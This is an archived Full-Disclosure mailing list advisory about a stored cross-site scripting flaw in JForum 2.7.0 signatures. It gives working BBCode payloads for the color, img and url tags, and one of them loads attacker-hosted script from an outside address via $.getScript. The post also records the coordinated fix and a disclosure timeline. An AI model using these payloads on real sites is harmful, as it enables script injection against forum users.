| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 2 Sep 2021 16:55:24 +0800
From: kun song <songkun2008@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] a xss vulnerability in Jforum 2.7.0
hi,
I found a vulnerability in the jforum 2.7.0. It is a storage cross site
script vulnerability. The place is the user's profile - signature. The
technique of the vulnerability is the same as that described in this
article "STORED CROSS SITE SCRIPTING IN BBCODE" (
https://mindedsecurity.com/advisories/msa130510/), and the POC is:
color tag:
[color=red" onMouseOver="alert('xss')]XSS[/color]
[color=red" onMouseOver="$.getScript('http://192.168.45.148:8080/evil.js')
;"]XSS[/color]
Renders into HTML:
<font onmouseover="alert('xss')" color="red">XSS</font>
<font onmouseover="$.getScript('http://192.168.45.148:8080/evil.js');"
color="red">XSS</font>
img tag:
[img]/demo.jpg" onMouseOver="alert('xss')[/img]
Renders into HTML:
<img src="/demo.jpg" onmouseover="alert('xss')" alt="image">
url= tag:
[url='http://www.demo.com" onMouseOver="alert('xss')']test[/url]
Renders into HTML:
<a class="snap_shots" href="http://www.demo.com" onmouseover="alert('xss')"
target="_blank">test</a>
through analysis, the forum has set the cookie to http-only, but the
attacker can use the $.getScript to do some evil things.
this vulnerability has been fixed in
https://sourceforge.net/p/jforum2/code/934/ .
timeline:
2021-04-21 announce the developer of Jforum by e-mail
2021-04-22 Jforum fixed the vulnerability, and will include this fix in
next release
2021-09-02 send this mail to bugtraq&fulldisclosure
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists